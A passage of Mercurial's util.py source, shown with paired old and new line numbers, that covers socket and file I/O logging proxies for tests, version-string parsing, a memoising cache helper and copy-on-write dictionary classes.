583 class observedbufferedinputpipe(bufferedinputpipe):
581 class observedbufferedinputpipe(bufferedinputpipe):
584 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
582 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
585
583
586 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
584 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
587 bypass ``fileobjectproxy``. Because of this, we need to make
585 bypass ``fileobjectproxy``. Because of this, we need to make
588 ``bufferedinputpipe`` aware of these operations.
586 ``bufferedinputpipe`` aware of these operations.
589
587
590 This variation of ``bufferedinputpipe`` can notify observers about
588 This variation of ``bufferedinputpipe`` can notify observers about
591 ``os.read()`` events. It also re-publishes other events, such as
589 ``os.read()`` events. It also re-publishes other events, such as
592 ``read()`` and ``readline()``.
590 ``read()`` and ``readline()``.
593 """
591 """
594 def _fillbuffer(self):
592 def _fillbuffer(self):
595 res = super(observedbufferedinputpipe, self)._fillbuffer()
593 res = super(observedbufferedinputpipe, self)._fillbuffer()
596
594
597 fn = getattr(self._input._observer, r'osread', None)
595 fn = getattr(self._input._observer, r'osread', None)
598 if fn:
596 if fn:
599 fn(res, _chunksize)
597 fn(res, _chunksize)
600
598
601 return res
599 return res
602
600
603 # We use different observer methods because the operation isn't
601 # We use different observer methods because the operation isn't
604 # performed on the actual file object but on us.
602 # performed on the actual file object but on us.
605 def read(self, size):
603 def read(self, size):
606 res = super(observedbufferedinputpipe, self).read(size)
604 res = super(observedbufferedinputpipe, self).read(size)
607
605
608 fn = getattr(self._input._observer, r'bufferedread', None)
606 fn = getattr(self._input._observer, r'bufferedread', None)
609 if fn:
607 if fn:
610 fn(res, size)
608 fn(res, size)
611
609
612 return res
610 return res
613
611
614 def readline(self, *args, **kwargs):
612 def readline(self, *args, **kwargs):
615 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
613 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
616
614
617 fn = getattr(self._input._observer, r'bufferedreadline', None)
615 fn = getattr(self._input._observer, r'bufferedreadline', None)
618 if fn:
616 if fn:
619 fn(res)
617 fn(res)
620
618
621 return res
619 return res
622
620
623 PROXIED_SOCKET_METHODS = {
621 PROXIED_SOCKET_METHODS = {
624 r'makefile',
622 r'makefile',
625 r'recv',
623 r'recv',
626 r'recvfrom',
624 r'recvfrom',
627 r'recvfrom_into',
625 r'recvfrom_into',
628 r'recv_into',
626 r'recv_into',
629 r'send',
627 r'send',
630 r'sendall',
628 r'sendall',
631 r'sendto',
629 r'sendto',
632 r'setblocking',
630 r'setblocking',
633 r'settimeout',
631 r'settimeout',
634 r'gettimeout',
632 r'gettimeout',
635 r'setsockopt',
633 r'setsockopt',
636 }
634 }
637
635
638 class socketproxy(object):
636 class socketproxy(object):
639 """A proxy around a socket that tells a watcher when events occur.
637 """A proxy around a socket that tells a watcher when events occur.
640
638
641 This is like ``fileobjectproxy`` except for sockets.
639 This is like ``fileobjectproxy`` except for sockets.
642
640
643 This type is intended to only be used for testing purposes. Think hard
641 This type is intended to only be used for testing purposes. Think hard
644 before using it in important code.
642 before using it in important code.
645 """
643 """
646 __slots__ = (
644 __slots__ = (
647 r'_orig',
645 r'_orig',
648 r'_observer',
646 r'_observer',
649 )
647 )
650
648
651 def __init__(self, sock, observer):
649 def __init__(self, sock, observer):
652 object.__setattr__(self, r'_orig', sock)
650 object.__setattr__(self, r'_orig', sock)
653 object.__setattr__(self, r'_observer', observer)
651 object.__setattr__(self, r'_observer', observer)
654
652
655 def __getattribute__(self, name):
653 def __getattribute__(self, name):
656 if name in PROXIED_SOCKET_METHODS:
654 if name in PROXIED_SOCKET_METHODS:
657 return object.__getattribute__(self, name)
655 return object.__getattribute__(self, name)
658
656
659 return getattr(object.__getattribute__(self, r'_orig'), name)
657 return getattr(object.__getattribute__(self, r'_orig'), name)
660
658
661 def __delattr__(self, name):
659 def __delattr__(self, name):
662 return delattr(object.__getattribute__(self, r'_orig'), name)
660 return delattr(object.__getattribute__(self, r'_orig'), name)
663
661
664 def __setattr__(self, name, value):
662 def __setattr__(self, name, value):
665 return setattr(object.__getattribute__(self, r'_orig'), name, value)
663 return setattr(object.__getattribute__(self, r'_orig'), name, value)
666
664
667 def __nonzero__(self):
665 def __nonzero__(self):
668 return bool(object.__getattribute__(self, r'_orig'))
666 return bool(object.__getattribute__(self, r'_orig'))
669
667
670 __bool__ = __nonzero__
668 __bool__ = __nonzero__
671
669
672 def _observedcall(self, name, *args, **kwargs):
670 def _observedcall(self, name, *args, **kwargs):
673 # Call the original object.
671 # Call the original object.
674 orig = object.__getattribute__(self, r'_orig')
672 orig = object.__getattribute__(self, r'_orig')
675 res = getattr(orig, name)(*args, **kwargs)
673 res = getattr(orig, name)(*args, **kwargs)
676
674
677 # Call a method on the observer of the same name with arguments
675 # Call a method on the observer of the same name with arguments
678 # so it can react, log, etc.
676 # so it can react, log, etc.
679 observer = object.__getattribute__(self, r'_observer')
677 observer = object.__getattribute__(self, r'_observer')
680 fn = getattr(observer, name, None)
678 fn = getattr(observer, name, None)
681 if fn:
679 if fn:
682 fn(res, *args, **kwargs)
680 fn(res, *args, **kwargs)
683
681
684 return res
682 return res
685
683
686 def makefile(self, *args, **kwargs):
684 def makefile(self, *args, **kwargs):
687 res = object.__getattribute__(self, r'_observedcall')(
685 res = object.__getattribute__(self, r'_observedcall')(
688 r'makefile', *args, **kwargs)
686 r'makefile', *args, **kwargs)
689
687
690 # The file object may be used for I/O. So we turn it into a
688 # The file object may be used for I/O. So we turn it into a
691 # proxy using our observer.
689 # proxy using our observer.
692 observer = object.__getattribute__(self, r'_observer')
690 observer = object.__getattribute__(self, r'_observer')
693 return makeloggingfileobject(observer.fh, res, observer.name,
691 return makeloggingfileobject(observer.fh, res, observer.name,
694 reads=observer.reads,
692 reads=observer.reads,
695 writes=observer.writes,
693 writes=observer.writes,
696 logdata=observer.logdata,
694 logdata=observer.logdata,
697 logdataapis=observer.logdataapis)
695 logdataapis=observer.logdataapis)
698
696
699 def recv(self, *args, **kwargs):
697 def recv(self, *args, **kwargs):
700 return object.__getattribute__(self, r'_observedcall')(
698 return object.__getattribute__(self, r'_observedcall')(
701 r'recv', *args, **kwargs)
699 r'recv', *args, **kwargs)
702
700
703 def recvfrom(self, *args, **kwargs):
701 def recvfrom(self, *args, **kwargs):
704 return object.__getattribute__(self, r'_observedcall')(
702 return object.__getattribute__(self, r'_observedcall')(
705 r'recvfrom', *args, **kwargs)
703 r'recvfrom', *args, **kwargs)
706
704
707 def recvfrom_into(self, *args, **kwargs):
705 def recvfrom_into(self, *args, **kwargs):
708 return object.__getattribute__(self, r'_observedcall')(
706 return object.__getattribute__(self, r'_observedcall')(
709 r'recvfrom_into', *args, **kwargs)
707 r'recvfrom_into', *args, **kwargs)
710
708
711 def recv_into(self, *args, **kwargs):
709 def recv_into(self, *args, **kwargs):
712 return object.__getattribute__(self, r'_observedcall')(
710 return object.__getattribute__(self, r'_observedcall')(
713 r'recv_info', *args, **kwargs)
711 r'recv_info', *args, **kwargs)
714
712
715 def send(self, *args, **kwargs):
713 def send(self, *args, **kwargs):
716 return object.__getattribute__(self, r'_observedcall')(
714 return object.__getattribute__(self, r'_observedcall')(
717 r'send', *args, **kwargs)
715 r'send', *args, **kwargs)
718
716
719 def sendall(self, *args, **kwargs):
717 def sendall(self, *args, **kwargs):
720 return object.__getattribute__(self, r'_observedcall')(
718 return object.__getattribute__(self, r'_observedcall')(
721 r'sendall', *args, **kwargs)
719 r'sendall', *args, **kwargs)
722
720
723 def sendto(self, *args, **kwargs):
721 def sendto(self, *args, **kwargs):
724 return object.__getattribute__(self, r'_observedcall')(
722 return object.__getattribute__(self, r'_observedcall')(
725 r'sendto', *args, **kwargs)
723 r'sendto', *args, **kwargs)
726
724
727 def setblocking(self, *args, **kwargs):
725 def setblocking(self, *args, **kwargs):
728 return object.__getattribute__(self, r'_observedcall')(
726 return object.__getattribute__(self, r'_observedcall')(
729 r'setblocking', *args, **kwargs)
727 r'setblocking', *args, **kwargs)
730
728
731 def settimeout(self, *args, **kwargs):
729 def settimeout(self, *args, **kwargs):
732 return object.__getattribute__(self, r'_observedcall')(
730 return object.__getattribute__(self, r'_observedcall')(
733 r'settimeout', *args, **kwargs)
731 r'settimeout', *args, **kwargs)
734
732
735 def gettimeout(self, *args, **kwargs):
733 def gettimeout(self, *args, **kwargs):
736 return object.__getattribute__(self, r'_observedcall')(
734 return object.__getattribute__(self, r'_observedcall')(
737 r'gettimeout', *args, **kwargs)
735 r'gettimeout', *args, **kwargs)
738
736
739 def setsockopt(self, *args, **kwargs):
737 def setsockopt(self, *args, **kwargs):
740 return object.__getattribute__(self, r'_observedcall')(
738 return object.__getattribute__(self, r'_observedcall')(
741 r'setsockopt', *args, **kwargs)
739 r'setsockopt', *args, **kwargs)
742
740
743 class baseproxyobserver(object):
741 class baseproxyobserver(object):
744 def _writedata(self, data):
742 def _writedata(self, data):
745 if not self.logdata:
743 if not self.logdata:
746 if self.logdataapis:
744 if self.logdataapis:
747 self.fh.write('\n')
745 self.fh.write('\n')
748 self.fh.flush()
746 self.fh.flush()
749 return
747 return
750
748
751 # Simple case writes all data on a single line.
749 # Simple case writes all data on a single line.
752 if b'\n' not in data:
750 if b'\n' not in data:
753 if self.logdataapis:
751 if self.logdataapis:
754 self.fh.write(': %s\n' % stringutil.escapestr(data))
752 self.fh.write(': %s\n' % stringutil.escapestr(data))
755 else:
753 else:
756 self.fh.write('%s> %s\n'
754 self.fh.write('%s> %s\n'
757 % (self.name, stringutil.escapestr(data)))
755 % (self.name, stringutil.escapestr(data)))
758 self.fh.flush()
756 self.fh.flush()
759 return
757 return
760
758
761 # Data with newlines is written to multiple lines.
759 # Data with newlines is written to multiple lines.
762 if self.logdataapis:
760 if self.logdataapis:
763 self.fh.write(':\n')
761 self.fh.write(':\n')
764
762
765 lines = data.splitlines(True)
763 lines = data.splitlines(True)
766 for line in lines:
764 for line in lines:
767 self.fh.write('%s> %s\n'
765 self.fh.write('%s> %s\n'
768 % (self.name, stringutil.escapestr(line)))
766 % (self.name, stringutil.escapestr(line)))
769 self.fh.flush()
767 self.fh.flush()
770
768
771 class fileobjectobserver(baseproxyobserver):
769 class fileobjectobserver(baseproxyobserver):
772 """Logs file object activity."""
770 """Logs file object activity."""
773 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
771 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
774 logdataapis=True):
772 logdataapis=True):
775 self.fh = fh
773 self.fh = fh
776 self.name = name
774 self.name = name
777 self.logdata = logdata
775 self.logdata = logdata
778 self.logdataapis = logdataapis
776 self.logdataapis = logdataapis
779 self.reads = reads
777 self.reads = reads
780 self.writes = writes
778 self.writes = writes
781
779
782 def read(self, res, size=-1):
780 def read(self, res, size=-1):
783 if not self.reads:
781 if not self.reads:
784 return
782 return
785 # Python 3 can return None from reads at EOF instead of empty strings.
783 # Python 3 can return None from reads at EOF instead of empty strings.
786 if res is None:
784 if res is None:
787 res = ''
785 res = ''
788
786
789 if self.logdataapis:
787 if self.logdataapis:
790 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
788 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
791
789
792 self._writedata(res)
790 self._writedata(res)
793
791
794 def readline(self, res, limit=-1):
792 def readline(self, res, limit=-1):
795 if not self.reads:
793 if not self.reads:
796 return
794 return
797
795
798 if self.logdataapis:
796 if self.logdataapis:
799 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
797 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
800
798
801 self._writedata(res)
799 self._writedata(res)
802
800
803 def readinto(self, res, dest):
801 def readinto(self, res, dest):
804 if not self.reads:
802 if not self.reads:
805 return
803 return
806
804
807 if self.logdataapis:
805 if self.logdataapis:
808 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
806 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
809 res))
807 res))
810
808
811 data = dest[0:res] if res is not None else b''
809 data = dest[0:res] if res is not None else b''
812 self._writedata(data)
810 self._writedata(data)
813
811
814 def write(self, res, data):
812 def write(self, res, data):
815 if not self.writes:
813 if not self.writes:
816 return
814 return
817
815
818 # Python 2 returns None from some write() calls. Python 3 (reasonably)
816 # Python 2 returns None from some write() calls. Python 3 (reasonably)
819 # returns the integer bytes written.
817 # returns the integer bytes written.
820 if res is None and data:
818 if res is None and data:
821 res = len(data)
819 res = len(data)
822
820
823 if self.logdataapis:
821 if self.logdataapis:
824 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
822 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
825
823
826 self._writedata(data)
824 self._writedata(data)
827
825
828 def flush(self, res):
826 def flush(self, res):
829 if not self.writes:
827 if not self.writes:
830 return
828 return
831
829
832 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
830 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
833
831
834 # For observedbufferedinputpipe.
832 # For observedbufferedinputpipe.
835 def bufferedread(self, res, size):
833 def bufferedread(self, res, size):
836 if not self.reads:
834 if not self.reads:
837 return
835 return
838
836
839 if self.logdataapis:
837 if self.logdataapis:
840 self.fh.write('%s> bufferedread(%d) -> %d' % (
838 self.fh.write('%s> bufferedread(%d) -> %d' % (
841 self.name, size, len(res)))
839 self.name, size, len(res)))
842
840
843 self._writedata(res)
841 self._writedata(res)
844
842
845 def bufferedreadline(self, res):
843 def bufferedreadline(self, res):
846 if not self.reads:
844 if not self.reads:
847 return
845 return
848
846
849 if self.logdataapis:
847 if self.logdataapis:
850 self.fh.write('%s> bufferedreadline() -> %d' % (
848 self.fh.write('%s> bufferedreadline() -> %d' % (
851 self.name, len(res)))
849 self.name, len(res)))
852
850
853 self._writedata(res)
851 self._writedata(res)
854
852
855 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
853 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
856 logdata=False, logdataapis=True):
854 logdata=False, logdataapis=True):
857 """Turn a file object into a logging file object."""
855 """Turn a file object into a logging file object."""
858
856
859 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
857 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
860 logdata=logdata, logdataapis=logdataapis)
858 logdata=logdata, logdataapis=logdataapis)
861 return fileobjectproxy(fh, observer)
859 return fileobjectproxy(fh, observer)
862
860
863 class socketobserver(baseproxyobserver):
861 class socketobserver(baseproxyobserver):
864 """Logs socket activity."""
862 """Logs socket activity."""
865 def __init__(self, fh, name, reads=True, writes=True, states=True,
863 def __init__(self, fh, name, reads=True, writes=True, states=True,
866 logdata=False, logdataapis=True):
864 logdata=False, logdataapis=True):
867 self.fh = fh
865 self.fh = fh
868 self.name = name
866 self.name = name
869 self.reads = reads
867 self.reads = reads
870 self.writes = writes
868 self.writes = writes
871 self.states = states
869 self.states = states
872 self.logdata = logdata
870 self.logdata = logdata
873 self.logdataapis = logdataapis
871 self.logdataapis = logdataapis
874
872
875 def makefile(self, res, mode=None, bufsize=None):
873 def makefile(self, res, mode=None, bufsize=None):
876 if not self.states:
874 if not self.states:
877 return
875 return
878
876
879 self.fh.write('%s> makefile(%r, %r)\n' % (
877 self.fh.write('%s> makefile(%r, %r)\n' % (
880 self.name, mode, bufsize))
878 self.name, mode, bufsize))
881
879
882 def recv(self, res, size, flags=0):
880 def recv(self, res, size, flags=0):
883 if not self.reads:
881 if not self.reads:
884 return
882 return
885
883
886 if self.logdataapis:
884 if self.logdataapis:
887 self.fh.write('%s> recv(%d, %d) -> %d' % (
885 self.fh.write('%s> recv(%d, %d) -> %d' % (
888 self.name, size, flags, len(res)))
886 self.name, size, flags, len(res)))
889 self._writedata(res)
887 self._writedata(res)
890
888
891 def recvfrom(self, res, size, flags=0):
889 def recvfrom(self, res, size, flags=0):
892 if not self.reads:
890 if not self.reads:
893 return
891 return
894
892
895 if self.logdataapis:
893 if self.logdataapis:
896 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
894 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
897 self.name, size, flags, len(res[0])))
895 self.name, size, flags, len(res[0])))
898
896
899 self._writedata(res[0])
897 self._writedata(res[0])
900
898
901 def recvfrom_into(self, res, buf, size, flags=0):
899 def recvfrom_into(self, res, buf, size, flags=0):
902 if not self.reads:
900 if not self.reads:
903 return
901 return
904
902
905 if self.logdataapis:
903 if self.logdataapis:
906 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
904 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
907 self.name, size, flags, res[0]))
905 self.name, size, flags, res[0]))
908
906
909 self._writedata(buf[0:res[0]])
907 self._writedata(buf[0:res[0]])
910
908
911 def recv_into(self, res, buf, size=0, flags=0):
909 def recv_into(self, res, buf, size=0, flags=0):
912 if not self.reads:
910 if not self.reads:
913 return
911 return
914
912
915 if self.logdataapis:
913 if self.logdataapis:
916 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
914 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
917 self.name, size, flags, res))
915 self.name, size, flags, res))
918
916
919 self._writedata(buf[0:res])
917 self._writedata(buf[0:res])
920
918
921 def send(self, res, data, flags=0):
919 def send(self, res, data, flags=0):
922 if not self.writes:
920 if not self.writes:
923 return
921 return
924
922
925 self.fh.write('%s> send(%d, %d) -> %d' % (
923 self.fh.write('%s> send(%d, %d) -> %d' % (
926 self.name, len(data), flags, len(res)))
924 self.name, len(data), flags, len(res)))
927 self._writedata(data)
925 self._writedata(data)
928
926
929 def sendall(self, res, data, flags=0):
927 def sendall(self, res, data, flags=0):
930 if not self.writes:
928 if not self.writes:
931 return
929 return
932
930
933 if self.logdataapis:
931 if self.logdataapis:
934 # Returns None on success. So don't bother reporting return value.
932 # Returns None on success. So don't bother reporting return value.
935 self.fh.write('%s> sendall(%d, %d)' % (
933 self.fh.write('%s> sendall(%d, %d)' % (
936 self.name, len(data), flags))
934 self.name, len(data), flags))
937
935
938 self._writedata(data)
936 self._writedata(data)
939
937
940 def sendto(self, res, data, flagsoraddress, address=None):
938 def sendto(self, res, data, flagsoraddress, address=None):
941 if not self.writes:
939 if not self.writes:
942 return
940 return
943
941
944 if address:
942 if address:
945 flags = flagsoraddress
943 flags = flagsoraddress
946 else:
944 else:
947 flags = 0
945 flags = 0
948
946
949 if self.logdataapis:
947 if self.logdataapis:
950 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
948 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
951 self.name, len(data), flags, address, res))
949 self.name, len(data), flags, address, res))
952
950
953 self._writedata(data)
951 self._writedata(data)
954
952
955 def setblocking(self, res, flag):
953 def setblocking(self, res, flag):
956 if not self.states:
954 if not self.states:
957 return
955 return
958
956
959 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
957 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
960
958
961 def settimeout(self, res, value):
959 def settimeout(self, res, value):
962 if not self.states:
960 if not self.states:
963 return
961 return
964
962
965 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
963 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
966
964
967 def gettimeout(self, res):
965 def gettimeout(self, res):
968 if not self.states:
966 if not self.states:
969 return
967 return
970
968
971 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
969 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
972
970
973 def setsockopt(self, level, optname, value):
971 def setsockopt(self, level, optname, value):
974 if not self.states:
972 if not self.states:
975 return
973 return
976
974
977 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
975 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
978 self.name, level, optname, value))
976 self.name, level, optname, value))
979
977
980 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
978 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
981 logdata=False, logdataapis=True):
979 logdata=False, logdataapis=True):
982 """Turn a socket into a logging socket."""
980 """Turn a socket into a logging socket."""
983
981
984 observer = socketobserver(logh, name, reads=reads, writes=writes,
982 observer = socketobserver(logh, name, reads=reads, writes=writes,
985 states=states, logdata=logdata,
983 states=states, logdata=logdata,
986 logdataapis=logdataapis)
984 logdataapis=logdataapis)
987 return socketproxy(fh, observer)
985 return socketproxy(fh, observer)
988
986
989 def version():
987 def version():
990 """Return version information if available."""
988 """Return version information if available."""
991 try:
989 try:
992 from . import __version__
990 from . import __version__
993 return __version__.version
991 return __version__.version
994 except ImportError:
992 except ImportError:
995 return 'unknown'
993 return 'unknown'
996
994
997 def versiontuple(v=None, n=4):
995 def versiontuple(v=None, n=4):
998 """Parses a Mercurial version string into an N-tuple.
996 """Parses a Mercurial version string into an N-tuple.
999
997
1000 The version string to be parsed is specified with the ``v`` argument.
998 The version string to be parsed is specified with the ``v`` argument.
1001 If it isn't defined, the current Mercurial version string will be parsed.
999 If it isn't defined, the current Mercurial version string will be parsed.
1002
1000
1003 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1001 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1004 returned values:
1002 returned values:
1005
1003
1006 >>> v = b'3.6.1+190-df9b73d2d444'
1004 >>> v = b'3.6.1+190-df9b73d2d444'
1007 >>> versiontuple(v, 2)
1005 >>> versiontuple(v, 2)
1008 (3, 6)
1006 (3, 6)
1009 >>> versiontuple(v, 3)
1007 >>> versiontuple(v, 3)
1010 (3, 6, 1)
1008 (3, 6, 1)
1011 >>> versiontuple(v, 4)
1009 >>> versiontuple(v, 4)
1012 (3, 6, 1, '190-df9b73d2d444')
1010 (3, 6, 1, '190-df9b73d2d444')
1013
1011
1014 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1012 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1015 (3, 6, 1, '190-df9b73d2d444+20151118')
1013 (3, 6, 1, '190-df9b73d2d444+20151118')
1016
1014
1017 >>> v = b'3.6'
1015 >>> v = b'3.6'
1018 >>> versiontuple(v, 2)
1016 >>> versiontuple(v, 2)
1019 (3, 6)
1017 (3, 6)
1020 >>> versiontuple(v, 3)
1018 >>> versiontuple(v, 3)
1021 (3, 6, None)
1019 (3, 6, None)
1022 >>> versiontuple(v, 4)
1020 >>> versiontuple(v, 4)
1023 (3, 6, None, None)
1021 (3, 6, None, None)
1024
1022
1025 >>> v = b'3.9-rc'
1023 >>> v = b'3.9-rc'
1026 >>> versiontuple(v, 2)
1024 >>> versiontuple(v, 2)
1027 (3, 9)
1025 (3, 9)
1028 >>> versiontuple(v, 3)
1026 >>> versiontuple(v, 3)
1029 (3, 9, None)
1027 (3, 9, None)
1030 >>> versiontuple(v, 4)
1028 >>> versiontuple(v, 4)
1031 (3, 9, None, 'rc')
1029 (3, 9, None, 'rc')
1032
1030
1033 >>> v = b'3.9-rc+2-02a8fea4289b'
1031 >>> v = b'3.9-rc+2-02a8fea4289b'
1034 >>> versiontuple(v, 2)
1032 >>> versiontuple(v, 2)
1035 (3, 9)
1033 (3, 9)
1036 >>> versiontuple(v, 3)
1034 >>> versiontuple(v, 3)
1037 (3, 9, None)
1035 (3, 9, None)
1038 >>> versiontuple(v, 4)
1036 >>> versiontuple(v, 4)
1039 (3, 9, None, 'rc+2-02a8fea4289b')
1037 (3, 9, None, 'rc+2-02a8fea4289b')
1040
1038
1041 >>> versiontuple(b'4.6rc0')
1039 >>> versiontuple(b'4.6rc0')
1042 (4, 6, None, 'rc0')
1040 (4, 6, None, 'rc0')
1043 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1041 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1044 (4, 6, None, 'rc0+12-425d55e54f98')
1042 (4, 6, None, 'rc0+12-425d55e54f98')
1045 >>> versiontuple(b'.1.2.3')
1043 >>> versiontuple(b'.1.2.3')
1046 (None, None, None, '.1.2.3')
1044 (None, None, None, '.1.2.3')
1047 >>> versiontuple(b'12.34..5')
1045 >>> versiontuple(b'12.34..5')
1048 (12, 34, None, '..5')
1046 (12, 34, None, '..5')
1049 >>> versiontuple(b'1.2.3.4.5.6')
1047 >>> versiontuple(b'1.2.3.4.5.6')
1050 (1, 2, 3, '.4.5.6')
1048 (1, 2, 3, '.4.5.6')
1051 """
1049 """
1052 if not v:
1050 if not v:
1053 v = version()
1051 v = version()
1054 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1052 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1055 if not m:
1053 if not m:
1056 vparts, extra = '', v
1054 vparts, extra = '', v
1057 elif m.group(2):
1055 elif m.group(2):
1058 vparts, extra = m.groups()
1056 vparts, extra = m.groups()
1059 else:
1057 else:
1060 vparts, extra = m.group(1), None
1058 vparts, extra = m.group(1), None
1061
1059
1062 vints = []
1060 vints = []
1063 for i in vparts.split('.'):
1061 for i in vparts.split('.'):
1064 try:
1062 try:
1065 vints.append(int(i))
1063 vints.append(int(i))
1066 except ValueError:
1064 except ValueError:
1067 break
1065 break
1068 # (3, 6) -> (3, 6, None)
1066 # (3, 6) -> (3, 6, None)
1069 while len(vints) < 3:
1067 while len(vints) < 3:
1070 vints.append(None)
1068 vints.append(None)
1071
1069
1072 if n == 2:
1070 if n == 2:
1073 return (vints[0], vints[1])
1071 return (vints[0], vints[1])
1074 if n == 3:
1072 if n == 3:
1075 return (vints[0], vints[1], vints[2])
1073 return (vints[0], vints[1], vints[2])
1076 if n == 4:
1074 if n == 4:
1077 return (vints[0], vints[1], vints[2], extra)
1075 return (vints[0], vints[1], vints[2], extra)
1078
1076
1079 def cachefunc(func):
1077 def cachefunc(func):
1080 '''cache the result of function calls'''
1078 '''cache the result of function calls'''
1081 # XXX doesn't handle keywords args
1079 # XXX doesn't handle keywords args
1082 if func.__code__.co_argcount == 0:
1080 if func.__code__.co_argcount == 0:
1083 cache = []
1081 cache = []
1084 def f():
1082 def f():
1085 if len(cache) == 0:
1083 if len(cache) == 0:
1086 cache.append(func())
1084 cache.append(func())
1087 return cache[0]
1085 return cache[0]
1088 return f
1086 return f
1089 cache = {}
1087 cache = {}
1090 if func.__code__.co_argcount == 1:
1088 if func.__code__.co_argcount == 1:
1091 # we gain a small amount of time because
1089 # we gain a small amount of time because
1092 # we don't need to pack/unpack the list
1090 # we don't need to pack/unpack the list
1093 def f(arg):
1091 def f(arg):
1094 if arg not in cache:
1092 if arg not in cache:
1095 cache[arg] = func(arg)
1093 cache[arg] = func(arg)
1096 return cache[arg]
1094 return cache[arg]
1097 else:
1095 else:
1098 def f(*args):
1096 def f(*args):
1099 if args not in cache:
1097 if args not in cache:
1100 cache[args] = func(*args)
1098 cache[args] = func(*args)
1101 return cache[args]
1099 return cache[args]
1102
1100
1103 return f
1101 return f
1104
1102
1105 class cow(object):
1103 class cow(object):
1106 """helper class to make copy-on-write easier
1104 """helper class to make copy-on-write easier
1107
1105
1108 Call preparewrite before doing any writes.
1106 Call preparewrite before doing any writes.
1109 """
1107 """
1110
1108
1111 def preparewrite(self):
1109 def preparewrite(self):
1112 """call this before writes, return self or a copied new object"""
1110 """call this before writes, return self or a copied new object"""
1113 if getattr(self, '_copied', 0):
1111 if getattr(self, '_copied', 0):
1114 self._copied -= 1
1112 self._copied -= 1
1115 return self.__class__(self)
1113 return self.__class__(self)
1116 return self
1114 return self
1117
1115
1118 def copy(self):
1116 def copy(self):
1119 """always do a cheap copy"""
1117 """always do a cheap copy"""
1120 self._copied = getattr(self, '_copied', 0) + 1
1118 self._copied = getattr(self, '_copied', 0) + 1
1121 return self
1119 return self
1122
1120
1123 class sortdict(collections.OrderedDict):
1121 class sortdict(collections.OrderedDict):
1124 '''a simple sorted dictionary
1122 '''a simple sorted dictionary
1125
1123
1126 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1124 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1127 >>> d2 = d1.copy()
1125 >>> d2 = d1.copy()
1128 >>> d2
1126 >>> d2
1129 sortdict([('a', 0), ('b', 1)])
1127 sortdict([('a', 0), ('b', 1)])
1130 >>> d2.update([(b'a', 2)])
1128 >>> d2.update([(b'a', 2)])
1131 >>> list(d2.keys()) # should still be in last-set order
1129 >>> list(d2.keys()) # should still be in last-set order
1132 ['b', 'a']
1130 ['b', 'a']
1133 '''
1131 '''
1134
1132
1135 def __setitem__(self, key, value):
1133 def __setitem__(self, key, value):
1136 if key in self:
1134 if key in self:
1137 del self[key]
1135 del self[key]
1138 super(sortdict, self).__setitem__(key, value)
1136 super(sortdict, self).__setitem__(key, value)
1139
1137
1140 if pycompat.ispypy:
1138 if pycompat.ispypy:
1141 # __setitem__() isn't called as of PyPy 5.8.0
1139 # __setitem__() isn't called as of PyPy 5.8.0
1142 def update(self, src):
1140 def update(self, src):
1143 if isinstance(src, dict):
1141 if isinstance(src, dict):
1144 src = src.iteritems()
1142 src = src.iteritems()
1145 for k, v in src:
1143 for k, v in src:
1146 self[k] = v
1144 self[k] = v
1147
1145
1148 class cowdict(cow, dict):
1146 class cowdict(cow, dict):
1149 """copy-on-write dict
1147 """copy-on-write dict
1150
1148
1151 Be sure to call d = d.preparewrite() before writing to d.
1149 Be sure to call d = d.preparewrite() before writing to d.
1152
1150
1153 >>> a = cowdict()
1151 >>> a = cowdict()
1154 >>> a is a.preparewrite()
1152 >>> a is a.preparewrite()
1155 True
1153 True
1156 >>> b = a.copy()
1154 >>> b = a.copy()
1157 >>> b is a
1155 >>> b is a
1158 True
1156 True
1159 >>> c = b.copy()
1157 >>> c = b.copy()
1160 >>> c is a
1158 >>> c is a
1161 True
1159 True
1162 >>> a = a.preparewrite()
